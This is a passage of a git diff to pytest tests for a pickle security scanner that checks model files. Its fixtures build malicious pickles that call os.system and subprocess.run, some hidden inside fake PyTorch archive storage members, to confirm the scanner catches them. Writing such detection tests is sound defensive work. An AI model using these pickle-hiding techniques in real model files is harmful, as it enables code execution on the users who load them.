package_api._raw_nested_extension_opcode_candidate_has_structural_signal( + value, + [package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES], + ) + assert package_api._literal_value_has_raw_nested_security_pickle(value) + +def test_raw_nested_extension_routes_headerless_literal_extension_tail() -> None: + assert package_api._raw_nested_extension_opcode_candidate_has_structural_signal( + b"C\x01x0\x82\x01", + [package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES], + ) -def test_scan_bytes_fails_closed_when_import_references_are_truncated() -> None: - payload = (b"cmath\nsin\n0" * 10_000) + b"cmath\ncos\n0." - report = scan_bytes(payload, source="import-reference-cap.pkl") +def test_literal_raw_nested_extension_scan_shares_candidate_budget(monkeypatch: pytest.MonkeyPatch) -> None: + remaining_budget_seen: list[int] = [] - assert report.status == ScanStatus.INCONCLUSIVE - assert report.verdict == SafetyVerdict.UNKNOWN - assert report.metadata["analysis_incomplete"] is True - assert report.metadata["import_references_truncated"] is True - assert len(report.metadata["import_references"]) == 10_000 - assert not any(reference["name"] == "cos" for reference in report.metadata["import_references"]) - notice = next(notice for notice in report.notices if notice.code == "import_references_truncated") - assert notice.details["analysis_incomplete"] is True - assert notice.details["max_import_references"] == 10_000 + def no_signal( + _candidate: bytes, + parse_budget_remaining: list[int], + *, + fail_closed_on_unknown_after_extension: bool = False, + ) -> bool: + assert fail_closed_on_unknown_after_extension is True + remaining_budget_seen.append(parse_budget_remaining[0]) + package_api._consume_raw_nested_structural_parse_budget(parse_budget_remaining) + return False + monkeypatch.setattr(package_api, "_raw_nested_extension_opcode_candidate_has_structural_signal", no_signal) -def test_scan_bytes_keeps_duplicate_import_reference_overflow_conclusive() -> None: - payload = (b"cmath\nsin\n0" * 10_001) + b"." + assert not package_api._literal_value_has_raw_nested_security_pickle(b"\x82\x010" * 4) + assert remaining_budget_seen == [ + package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES, + package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES - 1, + package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES - 2, + package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES - 3, + ] - report = scan_bytes(payload, source="duplicate-import-reference-cap.pkl") - assert report.status == ScanStatus.COMPLETE - assert report.verdict == SafetyVerdict.CLEAN - assert report.metadata["import_references_truncated"] is False - assert "analysis_incomplete" not in report.metadata - assert len(report.metadata["import_references"]) == 10_000 - assert all(notice.code != "import_references_truncated" for notice in report.notices) +@pytest.mark.parametrize( + "nested_payload", + [ + b"\x82\x01N0)R", + b"\x82\x01(N1)R", + ], +) +def test_scan_bytes_reports_raw_nested_extension_callable_after_pop(nested_payload: bytes) -> None: + report = scan_bytes(_proto0_string_literal(nested_payload), source="raw-extension-live.pkl") + assert report.status == ScanStatus.INCONCLUSIVE + assert report.verdict == SafetyVerdict.MALICIOUS + assert any( + finding.rule_code == "DANGEROUS_CALL" + and finding.details.get("module") == "copyreg.extension" + and finding.details.get("name") == "code_1" + for finding in report.findings + ) -def test_scan_stream_preserves_absolute_offsets_from_current_stream_position() -> None: - prefix = b"HEADER" - payload = pickle.dumps(MaliciousPayload()) - stream = io.BytesIO(prefix + payload) - stream.seek(len(prefix)) - report = PickleScanner().scan_stream(stream, source="embedded.npy", size=len(payload)) +def test_scan_bytes_reports_raw_nested_extension_with_literal_stop_like_operand() -> None: + report = scan_bytes(_proto0_string_literal(b"(C\x02(.0\x82\x01o"), source="raw-extension-mark-context.pkl") - assert report.metadata["first_pickle_end_pos"] == len(prefix) + len(payload) - finding_positions = [ - int(match.group(1)) + assert report.status == ScanStatus.INCONCLUSIVE + assert report.verdict == SafetyVerdict.MALICIOUS + assert any( + finding.rule_code == "DANGEROUS_CALL" + and finding.details.get("module") == "copyreg.extension" + and finding.details.get("name") == "code_1" for finding in report.findings - if finding.location is not None and "embedded.npy" in finding.location - for match in [re.search(r"\(pos (\d+)\)$", finding.location)] - if match is not None - ] - assert finding_positions - assert all(position >= len(prefix) for position in finding_positions) + ) -def test_scan_file_scans_binary_storage_member_inside_expanded_probe_window(tmp_path: Path) -> None: - """Widening the storage probe must not drop members the 4 KiB trusted probe scanned. +def test_scan_bytes_keeps_raw_nested_extension_removed_by_pop_clean() -> None: + report = scan_bytes(_proto0_string_literal(b"\x82\x010)R"), source="raw-extension-removed.pkl") - ``sample_is_prefix`` is derived from how much of the member the probe read, so a member between - the two probe sizes flips it from True to False, and the binary-pickle predicate refuses to scan - a non-STOP-terminated sample once it is no longer a prefix. - """ - hidden_payload = b"\x80\x04cos\nsystem\n(S'echo expanded-window'\ntR" - hidden_payload += b"\x00" * (5000 - len(hidden_payload)) - assert len(hidden_payload) > package_api._TRUSTED_STORAGE_PICKLE_PROBE_BYTES - assert len(hidden_payload) < package_api._PICKLE_DISCOVERY_LONG_PROBE_BYTES + _assert_clean_report(report) - entry_count = 33 - archive_path = tmp_path / "malicious-expanded-probe-window.pt" + +@pytest.mark.parametrize( + ("pickle_prefix", "case_name"), + [ + (b"\x80\x04NNNN\x00", "generic-routing"), + (b"\x80\x04N\x00", "trusted-two-op-routing"), + ], +) +def test_scan_file_preserves_pickle_routing_for_expanded_storage_probe( + tmp_path: Path, + pickle_prefix: bytes, + case_name: str, +) -> None: + hidden_payload = pickle_prefix + f"cos\nsystem\n(S'echo expanded-{case_name}'\ntR.".encode() + hidden_payload += b"\x00" * (5000 - len(hidden_payload)) + assert len(hidden_payload) == 5000 entries: list[bytes] = [] - for index in range(entry_count): + for index in range(33): key = _short_binunicode(f"weight_{index}".encode("ascii")) if index == 0: value = ( @@ -19441,12 +17638,13 @@ def test_scan_file_scans_binary_storage_member_inside_expanded_probe_window(tmp_ value = _pytorch_rebuild_tensor_v2_reduce_expr(key=str(index)) entries.append(key + value) data_pkl = b"\x80\x04" + _pytorch_empty_ordered_dict_reduce_expr() + b"(" + b"".join(entries) + b"u." + archive_path = tmp_path / f"malicious-expanded-{case_name}.pt" with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("archive/data.pkl", data_pkl) archive.writestr("archive/version", "3\n") archive.writestr("archive/byteorder", "little") archive.writestr("archive/data/0", hidden_payload) - for index in range(1, entry_count): + for index in range(1, 33): archive.writestr(f"archive/data/{index}", b"\x00" * 24) report = scan_file(archive_path) @@ -19462,208 +17660,361 @@ def test_scan_file_scans_binary_storage_member_inside_expanded_probe_window(tmp_ ) -@pytest.mark.parametrize( - "executable_candidate", - [ - base64.b64decode("ggEpUg=="), - base64.b64decode("ggFOMClS"), - base64.b64decode("ggEoTjEpUg=="), - b"\x82\x01q\x00N\x9400h\x00)R", - b"\x82\x01q\x00](NNNe0)R", - b"(\x82\x01)o", - b"(N0\x82\x01o", - b"\x82\x01Na", - b"\x82\x01NNs", - b"\x82\x01(Ne", - b"\x82\x01(NNu", - b"\x82\x01(N\x90", - b"\x82\x01", - b"(C\x02(.0\x82\x01o", - ], -) -def test_raw_nested_extension_reduce_candidate_routes_without_stop(executable_candidate: bytes) -> None: - assert package_api._raw_nested_extension_opcode_candidate_has_structural_signal( - executable_candidate, - [package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES], +def _assert_static_getattr_source_critical( + tmp_path: Path, monkeypatch: pytest.MonkeyPatch, source_text: str, source_name: str +) -> None: + _write_ultralytics_head_source( + tmp_path, + monkeypatch, + source_text, ) + report = scan_bytes(_static_getattr_reduce_payload(), source=source_name) -@pytest.mark.parametrize( - "benign_candidate", - [ - b"(C\x02\x82\x01o", - ], -) -def test_raw_nested_extension_reduce_candidate_skips_removed_or_shadowed_callable(benign_candidate: bytes) -> None: - assert not package_api._raw_nested_extension_opcode_candidate_has_structural_signal( - benign_candidate, - [package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES], + findings = _dangerous_getattr_findings(report) + assert findings + assert all(finding.severity == Severity.CRITICAL for finding in findings) + + +def _assert_rebound_framework_subprocess( + tmp_path: Path, + payload_path: Path, + marker: Path, + site_packages: Path, + script: str, + import_reference: str, +) -> None: + completed = subprocess.run( + [sys.executable, "-c", script, str(payload_path), str(marker)], + check=False, + env=_preimport_rebound_subprocess_env(tmp_path, site_packages), + capture_output=True, + text=True, + ) + + assert completed.returncode == 0, completed.stderr + output = json.loads(completed.stdout) + assert output["marker_before_unpickle"] is False + assert output["marker_after_unpickle"] is True + assert not (output["status"] == ScanStatus.COMPLETE.value and output["verdict"] == SafetyVerdict.CLEAN.value) + assert output["verdict"] in {SafetyVerdict.SUSPICIOUS.value, SafetyVerdict.MALICIOUS.value} + assert any( + finding["rule_code"] == "NON_ALLOWLISTED_GLOBAL" and finding["import_reference"] == import_reference + for finding in output["findings"] + ) + + +def _assert_storage_pickle_detected(archive_path: Path, storage_blob: bytes) -> None: + storage_blob += b" " * (-len(storage_blob) % 4) + with zipfile.ZipFile(archive_path, "w") as archive: + archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) + archive.writestr("archive/version", "3\n") + archive.writestr("archive/byteorder", "little") + archive.writestr("archive/data/0", storage_blob) + + report = scan_file(archive_path) + + assert report.verdict == SafetyVerdict.MALICIOUS + assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] + assert any( + finding.rule_code == "DANGEROUS_CALL" + and finding.location is not None + and f"{archive_path}:archive/data/0" in finding.location + for finding in report.findings + ) + + +def _assert_critical_click_finding_deduped(message: str, name: str) -> None: + pytest.importorskip("click") + + existing_finding = Finding( + message=message, + severity=Severity.CRITICAL, + location="click-startup-hook-write-dedupe.pkl", + rule_code="DANGEROUS_CALL", + details={"module": "click", "name": name}, + ) + report = PickleReport( + source="click-startup-hook-write-dedupe.pkl", + status=ScanStatus.COMPLETE, + verdict=SafetyVerdict.MALICIOUS, + findings=(existing_finding,), + metadata={ + "import_references": ( + {"module": "click", "name": "open_file"}, + {"module": "click", "name": "echo"}, + ), + "callable_invocations": ( + {"module": "click", "name": "open_file"}, + {"module": "click", "name": "echo"}, + ), + }, + ) + + updated = package_api._with_call_graph_findings(report) + + assert updated.status == report.status + assert updated.verdict == report.verdict + assert updated.findings == (existing_finding,) + + +def _assert_default_protocol_stack_global_tail(prefix: bytes, source_name: str) -> None: + payload = prefix + pickle.dumps(MaliciousPayload(), protocol=4)[2:] + + report = scan_bytes( + payload, + source=source_name, + options=ScanOptions(max_opcodes=2, post_budget_scan_bytes=4096), + ) + + assert report.status == ScanStatus.INCONCLUSIVE + assert report.verdict == SafetyVerdict.MALICIOUS + assert any( + finding.rule_code == "POST_BUDGET_GLOBAL" + and finding.severity == Severity.CRITICAL + and f"{finding.details.get('module')}.{finding.details.get('name')}" in SYSTEM_GLOBALS + for finding in report.findings + ) + + +def _assert_dill_reference_dangerous(payload_bytes: bytes, source_name: str, rule_code: str, reference: str) -> None: + payload = payload_bytes + + report = scan_bytes(payload, source=source_name) + + assert report.verdict == SafetyVerdict.MALICIOUS + assert any( + finding.rule_code == rule_code + and finding.severity == Severity.CRITICAL + and finding.details.get("import_reference") == reference + for finding in report.findings ) -def test_raw_nested_extension_routes_unknown_opcode_when_fail_closed_requested() -> None: - assert package_api._raw_nested_extension_opcode_candidate_has_structural_signal( - b"\x82\x01\xff", - [package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES], - fail_closed_on_unknown_after_extension=True, - ) - assert not package_api._raw_nested_extension_opcode_candidate_has_structural_signal( - b"\x82\x01\xff", - [package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES], - ) +def _assert_encoded_extension_routes(tmp_path: Path, filename: str, payload_bytes: bytes) -> None: + archive_path = tmp_path / filename + storage_blob = payload_bytes + storage_blob += b" " * (-len(storage_blob) % 4) + with zipfile.ZipFile(archive_path, "w") as archive: + archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) + archive.writestr("archive/version", "3\n") + archive.writestr("archive/byteorder", "little") + archive.writestr("archive/data/0", storage_blob) + report = scan_file(archive_path) -def test_raw_nested_extension_boundary_recovery_charges_shared_budget() -> None: - malformed_candidate = b"(" * 256 + b"\xff\x82\x01." - parse_budget_remaining = [3] + assert report.status == ScanStatus.INCONCLUSIVE + assert report.verdict == SafetyVerdict.UNKNOWN + assert list(report.metadata["pickle_files"]) == ["archive/data.pkl", "archive/data/0"] - assert package_api._raw_nested_extension_opcode_candidate_has_structural_signal( - malformed_candidate, - parse_budget_remaining, - ) - assert parse_budget_remaining == [0] +def _assert_expanded_padding_unrecognized(tmp_path: Path, padding_size: int) -> None: + archive_path = tmp_path / "model.pt" + storage_blob = b"N." + (b"\x00" * padding_size) + with zipfile.ZipFile(archive_path, "w") as archive: + archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) + archive.writestr("archive/version", "3\n") + archive.writestr("archive/byteorder", "little") + archive.writestr("archive/data/0", storage_blob) + + report = scan_file(archive_path) -def test_raw_nested_extension_routes_live_mark_after_context_budget_exhaustion() -> None: - value = (b"(\xff" * package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES) + b"(](NNNe0\x82\x01)o" + assert report.status == ScanStatus.COMPLETE + assert report.verdict == SafetyVerdict.CLEAN + assert list(report.metadata["pickle_files"]) == ["archive/data.pkl"] + assert not any(finding.location is not None and "archive/data/0" in finding.location for finding in report.findings) - assert package_api._raw_nested_extension_opcode_candidate_has_structural_signal( - value, - [package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES], - ) - assert package_api._literal_value_has_raw_nested_security_pickle(value) +def _assert_frame_boundary_violation(payload_bytes: bytes, source_name: str, reason: str, remaining_bytes: int) -> None: + payload = payload_bytes -def test_raw_nested_extension_routes_recovered_operand_boundary() -> None: - value = b"(" + (b"N" * (package_api._MAX_RAW_NESTED_PICKLE_CANDIDATE_BYTES - 2)) + b"\x82\x01)R." + report = scan_bytes(payload, source=source_name) - assert package_api._raw_nested_extension_opcode_candidate_has_structural_signal( - value, - [package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES], + assert report.status == ScanStatus.COMPLETE + assert report.verdict == SafetyVerdict.SUSPICIOUS + finding = next( + finding + for finding in report.findings + if finding.rule_code == "STRUCTURAL_TAMPER" and finding.details.get("overrun_boundary") == reason ) - assert package_api._literal_value_has_raw_nested_security_pickle(value) + assert finding.details["tamper_type"] == "oversized_frame" + assert finding.details["frame_length"] == 5 + assert finding.details["remaining_bytes"] == remaining_bytes -def test_raw_nested_extension_routes_headerless_literal_extension_tail() -> None: - assert package_api._raw_nested_extension_opcode_candidate_has_structural_signal( - b"C\x01x0\x82\x01", - [package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES], - ) +def _assert_frame_notice(payload_bytes: bytes, source_name: str, declared_size: int) -> None: + report = scan_bytes(payload_bytes, source=source_name) + assert report.status == ScanStatus.COMPLETE + assert report.verdict == SafetyVerdict.SUSPICIOUS + finding = next(finding for finding in report.findings if finding.rule_code == "STRUCTURAL_TAMPER") + assert finding.details["tamper_type"] == "oversized_frame" + assert finding.details["frame_length"] == declared_size + assert finding.details["remaining_bytes"] == 2 + notice = next(notice for notice in report.notices if notice.code == "oversized_frame") + assert notice.details["frame_length"] == declared_size + assert notice.details["remaining_bytes"] == 2 -def test_literal_raw_nested_extension_scan_shares_candidate_budget(monkeypatch: pytest.MonkeyPatch) -> None: - remaining_budget_seen: list[int] = [] - def no_signal( - _candidate: bytes, - parse_budget_remaining: list[int], - *, - fail_closed_on_unknown_after_extension: bool = False, - ) -> bool: - assert fail_closed_on_unknown_after_extension is True - remaining_budget_seen.append(parse_budget_remaining[0]) - package_api._consume_raw_nested_structural_parse_budget(parse_budget_remaining) - return False +def _assert_hidden_generic_zip_unrecognized(tmp_path: Path, filename: str, member_name: str) -> None: + archive_path = tmp_path / filename + entry = zipfile.ZipInfo(member_name, (1980, 1, 1, 0, 0, 0)) + with zipfile.ZipFile(archive_path, "w") as archive: + archive.writestr(entry, pickle.dumps({"weights": [1, 2, 3]}, protocol=4)) - monkeypatch.setattr(package_api, "_raw_nested_extension_opcode_candidate_has_structural_signal", no_signal) + report = scan_file(archive_path) - assert not package_api._literal_value_has_raw_nested_security_pickle(b"\x82\x010" * 4) - assert remaining_budget_seen == [ - package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES, - package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES - 1, - package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES - 2, - package_api._MAX_RAW_NESTED_PICKLE_CANDIDATES - 3, - ] + assert report.status == ScanStatus.ERROR + assert report.verdict == SafetyVerdict.UNKNOWN + assert "container_type" not in report.metadata -@pytest.mark.parametrize( - "nested_payload", - [ - b"\x82\x01N0)R", - b"\x82\x01(N1)R", - ], -) -def test_scan_bytes_reports_raw_nested_extension_callable_after_pop(nested_payload: bytes) -> None: - report = scan_bytes(_proto0_string_literal(nested_payload), source="raw-extension-live.pkl") +def _assert_large_literal_detected(trailing_windows: int, leading_size: int, source_name: str) -> None: + gap_padding = "A" * (trailing_windows * 1024 * 1024 + leading_size) + hidden_payload = gap_padding + "os.system('id')" + gap_padding + + report = scan_bytes( + pickle.dumps({"code": hidden_payload}, protocol=4), + source=source_name, + ) assert report.status == ScanStatus.INCONCLUSIVE - assert report.verdict == SafetyVerdict.MALICIOUS + assert report.verdict == SafetyVerdict.SUSPICIOUS assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.details.get("module") == "copyreg.extension" - and finding.details.get("name") == "code_1" + finding.rule_code == "SUSPICIOUS_STRING" and finding.details.get("pattern") == "os.system" for finding in report.findings ) + assert any(notice.code == "literal_scan_truncated" for notice in report.notices) -def test_scan_bytes_reports_raw_nested_extension_with_literal_stop_like_operand() -> None: - report = scan_bytes(_proto0_string_literal(b"(C\x02(.0\x82\x01o"), source="raw-extension-mark-context.pkl") +def _assert_noncanonical_storage_reference(payload_bytes: bytes, source_name: str) -> None: + payload = payload_bytes + + report = scan_bytes(payload, source=source_name) + + assert report.status == ScanStatus.COMPLETE + assert any( + finding.rule_code == "PERSISTENT_ID" and finding.details.get("opcode") == "BINPERSID" + for finding in report.findings + ) + assert report.notices == () + + +def _assert_prememoized_stack_global_tail(tail: bytes, source_name: str) -> None: + payload = _make_pre_memoized_post_budget_stack_global_payload(tail) + + report = scan_bytes( + payload, + source=source_name, + options=ScanOptions(max_opcodes=7, post_budget_scan_bytes=4096), + ) assert report.status == ScanStatus.INCONCLUSIVE assert report.verdict == SafetyVerdict.MALICIOUS assert any( - finding.rule_code == "DANGEROUS_CALL" - and finding.details.get("module") == "copyreg.extension" - and finding.details.get("name") == "code_1" + finding.rule_code == "POST_BUDGET_GLOBAL" + and finding.severity == Severity.CRITICAL + and finding.details.get("module") == "subprocess" + and finding.details.get("name") == "run" for finding in report.findings ) -def test_scan_bytes_keeps_raw_nested_extension_removed_by_pop_clean() -> None: - report = scan_bytes(_proto0_string_literal(b"\x82\x010)R"), source="raw-extension-removed.pkl") +def _assert_separator_near_match_unrecognized(tmp_path: Path, near_match: bytes) -> None: + archive_path = tmp_path / "model.pt" + storage_blob = near_match + storage_blob += b" " * (-len(storage_blob) % 4) + with zipfile.ZipFile(archive_path, "w") as archive: + archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) + archive.writestr("archive/version", "3\n") + archive.writestr("archive/byteorder", "little") + archive.writestr("archive/data/0", storage_blob) - _assert_clean_report(report) + report = scan_file(archive_path) + assert report.status == ScanStatus.COMPLETE + assert report.verdict == SafetyVerdict.CLEAN + assert list(report.metadata["pickle_files"]) == ["archive/data.pkl"] -@pytest.mark.parametrize( - ("pickle_prefix", "case_name"), - [ - (b"\x80\x04NNNN\x00", "generic-routing"), - (b"\x80\x04N\x00", "trusted-two-op-routing"), - ], -) -def test_scan_file_preserves_pickle_routing_for_expanded_storage_probe( - tmp_path: Path, - pickle_prefix: bytes, - case_name: str, -) -> None: - hidden_payload = pickle_prefix + f"cos\nsystem\n(S'echo expanded-{case_name}'\ntR.".encode() - hidden_payload += b"\x00" * (5000 - len(hidden_payload)) - assert len(hidden_payload) == 5000 - entries: list[bytes] = [] - for index in range(33): - key = _short_binunicode(f"weight_{index}".encode("ascii")) - if index == 0: - value = ( - _pytorch_rebuild_tensor_v2_payload( - key="0", - storage_name="ByteStorage", - element_count=len(hidden_payload), - ) - .removeprefix(b"\x80\x04") - .removesuffix(b".") - ) - else: - value = _pytorch_rebuild_tensor_v2_reduce_expr(key=str(index)) - entries.append(key + value) - data_pkl = b"\x80\x04" + _pytorch_empty_ordered_dict_reduce_expr() + b"(" + b"".join(entries) + b"u." - archive_path = tmp_path / f"malicious-expanded-{case_name}.pt" + +def _assert_separator_tensor_noise_unrecognized(tmp_path: Path, repeat_count: int) -> None: + archive_path = tmp_path / "model.pt" + storage_blob = b"N." + (b"c" * repeat_count) + storage_blob += b" " * (-len(storage_blob) % 4) with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("archive/data.pkl", data_pkl) + archive.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) archive.writestr("archive/version", "3\n") archive.writestr("archive/byteorder", "little") - archive.writestr("archive/data/0", hidden_payload) - for index in range(1, 33): - archive.writestr(f"archive/data/{index}", b"\x00" * 24) + archive.writestr("archive/data/0", storage_blob) report = scan_file(archive_path) + assert report.status == ScanStatus.COMPLETE + assert report.verdict == SafetyVerdict.CLEAN + assert list(report.metadata["pickle_files"]) == ["archive/data.pkl"] + + +def _assert_state_call(payload_bytes: bytes, source_name: str, opcode: str, reference: str) -> None: + payload = payload_bytes + + report = scan_bytes(payload, source=source_name) + + assert report.status == ScanStatus.COMPLETE assert report.verdict == SafetyVerdict.MALICIOUS assert any( - finding.severity == Severity.CRITICAL - and finding.details.get("module") in {"os", "posix", "nt"} - and finding.details.get("name") == "system" - and finding.location is not None - and "archive/data/0" in finding.location + finding.rule_code == "DANGEROUS_CALL" + and finding.details.get("opcode") == opcode + and finding.details.get("import_reference") == reference + for finding in report.findings + ) + + +def _assert_unresolved_hf_metadata_reduce( + module: str, name: str, monkeypatch: pytest.MonkeyPatch, source_name: str +) -> None: + _force_framework_metadata_unresolved(monkeypatch) + + report = scan_bytes(_metadata_reduce_payload(module, name) + b".", source=source_name) + + assert report.status in {ScanStatus.COMPLETE, ScanStatus.INCONCLUSIVE} + assert report.verdict == SafetyVerdict.SUSPICIOUS + assert any( + finding.rule_code == "NON_ALLOWLISTED_GLOBAL" and finding.details.get("import_reference") == f"{module}.{name}" for finding in report.findings ) + + +def _assert_valid_frames(payload_bytes: bytes, source_name: str) -> None: + payload = payload_bytes + + assert pickle.loads(payload) == {} + report = scan_bytes(payload, source=source_name) + + assert report.status == ScanStatus.COMPLETE + assert report.verdict == SafetyVerdict.CLEAN + assert not any(finding.details.get("tamper_type") == "oversized_frame" for finding in report.findings) + assert not any(notice.code == "oversized_frame" for notice in report.notices) + + +def _assert_inert_source_allowed(module_name: str) -> None: + payload = f"c{module_name}\nGadget\n.".encode() + + report = scan_bytes(payload, source=f"{module_name}.pkl") + + assert report.status == ScanStatus.COMPLETE + assert report.verdict == SafetyVerdict.CLEAN + assert all(finding.rule_code != "NON_ALLOWLISTED_GLOBAL" for finding in report.findings) + + +def _assert_source_hook_rejected(module_name: str, marker: Path) -> None: + payload = f"c{module_name}\nGadget\n.".encode() + + report = scan_bytes(payload, source=f"{module_name}.pkl") + + assert report.verdict == SafetyVerdict.SUSPICIOUS + assert marker.exists() is False + assert any(finding.rule_code == "NON_ALLOWLISTED_GLOBAL" for finding in report.findings) + + +def _encoded_key(value: str) -> bytes: + return _binunicode(value.encode("ascii")) diff --git a/packages/modelaudit-picklescan/tests/test_call_graph_assignment_alias_cycle.py b/packages/modelaudit-picklescan/tests/test_call_graph_assignment_alias_cycle.py index 40b1a5857..8ae27c209 100644 --- a/packages/modelaudit-picklescan/tests/test_call_graph_assignment_alias_cycle.py +++ b/packages/modelaudit-picklescan/tests/test_call_graph_assignment_alias_cycle.py @@ -11,7 +11,7 @@ import ast import threading -from collections.abc import Iterable +from collections.abc import Callable, Iterable from importlib.util import find_spec import pytest @@ -597,6 +597,19 @@ class Final: """ +def _reference_callback( + references: tuple[dict[str, str], ...] | dict[str, str], +) -> Callable[[object, tuple[dict[str, object], ...], set[tuple[str, str]]], tuple[dict[str, str], ...]]: + def _iter_references( + _import_references: object, + _callable_references: tuple[dict[str, object], ...], + _invoked_references: set[tuple[str, str]], + ) -> tuple[dict[str, str], ...]: + return (references,) if isinstance(references, dict) else references + + return _iter_references + + def _run_with_timeout(target: object, timeout: float = 10.0) -> None: thread = threading.Thread(target=target) # type: ignore[arg-type] thread.daemon = True @@ -641,22 +654,7 @@ def test_collect_assignment_aliases_fails_closed_on_stable_branch_rebind(source: local_defs = _collect_local_defs(statements) local_class_targets = {"testmod.A", "testmod.B", "testmod.Final"} - result: dict[str, bool] = {} - - def _collect() -> None: - with pytest.raises(_CallGraphAnalysisLimitError, match="ambiguous conditional rebinding"): - _collect_assignment_aliases( - statements, - "testmod", - {}, - local_defs, - local_class_targets, - ) - result["limited"] = True - - _run_with_timeout(_collect) - - assert result == {"limited": True} + _assert_alias_collection_limited(statements, local_defs, local_class_targets, "ambiguous conditional rebinding") @pytest.mark.parametrize( @@ -766,22 +764,7 @@ def test_collect_assignment_aliases_fails_closed_on_cyclic_dependency_propagatio local_defs = _collect_local_defs(statements) local_class_targets = {"testmod.A", "testmod.B"} - result: dict[str, bool] = {} - - def _collect() -> None: - with pytest.raises(_CallGraphAnalysisLimitError, match="entered a propagation cycle"): - _collect_assignment_aliases( - statements, - "testmod", - {}, - local_defs, - local_class_targets, - ) - result["limited"] = True - - _run_with_timeout(_collect) - - assert result == {"limited": True} + _assert_alias_collection_limited(statements, local_defs, local_class_targets, "entered a propagation cycle") def test_collect_assignment_aliases_fails_closed_on_long_period_cycles() -> None: @@ -801,22 +784,7 @@ def test_collect_assignment_aliases_fails_closed_on_long_period_cycles() -> None tree = ast.parse("\n".join(source_lines)) statements = _module_level_statements(tree) local_defs = _collect_local_defs(statements) - result: dict[str, bool] = {} - - def _collect() -> None: - with pytest.raises(_CallGraphAnalysisLimitError): - _collect_assignment_aliases( - statements, - "testmod", - {}, - local_defs, - local_class_targets, - ) - result["limited"] = True - - _run_with_timeout(_collect) - - assert result == {"limited": True} + _assert_alias_collection_limited(statements, local_defs, local_class_targets) def test_assignment_alias_limit_is_not_hidden_by_safe_entrypoint_wrapper(monkeypatch: pytest.MonkeyPatch) -> None: @@ -853,83 +821,13 @@ def _path(entrypoint: str) -> tuple[str, ...] | None: def test_assignment_alias_limit_preserves_prior_call_graph_findings( monkeypatch: pytest.MonkeyPatch, ) -> None: - references = ( - {"module": "dangerous", "name": "entry"}, - {"module": "limited", "name": "entry"}, - ) - - def _iter_references( - _import_references: object, - _callable_references: tuple[dict[str, object], ...], - _invoked_references: set[tuple[str, str]], - ) -> tuple[dict[str, str], ...]: - return references - - def _entrypoints(module: str, name: str, _reference: dict[str, object]) -> tuple[str, ...]: - return (f"{module}.{name}",) - - def _path(entrypoints: Iterable[str], _path_for: object) -> tuple[str, ...] | None: - if tuple(entrypoints) == ("limited.entry",): - raise _CallGraphAnalysisLimitError("assignment alias limit") - return ("dangerous.entry", "builtins.exec") - - monkeypatch.setattr("modelaudit_picklescan.call_graph._iter_call_graph_references", _iter_references) - monkeypatch.setattr("modelaudit_picklescan.call_graph._call_graph_entrypoints_for_reference", _entrypoints) - monkeypatch.setattr("modelaudit_picklescan.call_graph._first_matching_path", _path) - - with pytest.raises(_CallGraphAnalysisLimitError, match="assignment alias limit") as exc_info: - find_dangerous_call_graphs(()) - - assert exc_info.value.partial_findings == ( - CallGraphFinding( - module="dangerous", - name="entry", - import_reference="dangerous.entry", - sink="builtins.exec", - call_path=("dangerous.entry", "builtins.exec"), - ), - ) + _assert_alias_limit_findings(monkeypatch, "dangerous", "limited") def test_assignment_alias_limit_preserves_later_call_graph_findings( monkeypatch: pytest.MonkeyPatch, ) -> None: - references = ( - {"module": "limited", "name": "entry"}, - {"module": "dangerous", "name": "entry"}, - ) - - def _iter_references( - _import_references: object, - _callable_references: tuple[dict[str, object], ...], - _invoked_references: set[tuple[str, str]], - ) -> tuple[dict[str, str], ...]: - return references - - def _entrypoints(module: str, name: str, _reference: dict[str, object]) -> tuple[str, ...]: - return (f"{module}.{name}",) - - def _path(entrypoints: Iterable[str], _path_for: object) -> tuple[str, ...] | None: - if tuple(entrypoints) == ("limited.entry",): - raise _CallGraphAnalysisLimitError("assignment alias limit") - return ("dangerous.entry", "builtins.exec") - - monkeypatch.setattr("modelaudit_picklescan.call_graph._iter_call_graph_references", _iter_references) - monkeypatch.setattr("modelaudit_picklescan.call_graph._call_graph_entrypoints_for_reference", _entrypoints) - monkeypatch.setattr("modelaudit_picklescan.call_graph._first_matching_path", _path) - - with pytest.raises(_CallGraphAnalysisLimitError, match="assignment alias limit") as exc_info: - find_dangerous_call_graphs(()) - - assert exc_info.value.partial_findings == ( - CallGraphFinding( - module="dangerous", - name="entry", - import_reference="dangerous.entry", - sink="builtins.exec", - call_path=("dangerous.entry", "builtins.exec"), - ), - ) + _assert_alias_limit_findings(monkeypatch, "limited", "dangerous") def test_assignment_alias_limit_preserves_invoked_finding_after_sink_limit( @@ -938,12 +836,7 @@ def test_assignment_alias_limit_preserves_invoked_finding_after_sink_limit( reference = {"module": "invoked", "name": "entry"} path_calls = 0 - def _iter_references( - _import_references: object, - _callable_references: tuple[dict[str, object], ...], - _invoked_references: set[tuple[str, str]], - ) -> tuple[dict[str, str], ...]: - return (reference,) + _iter_references = _reference_callback(reference) def _entrypoints(module: str, name: str, _reference: dict[str, object]) -> tuple[str, ...]: return (f"{module}.{name}",) @@ -981,12 +874,7 @@ def 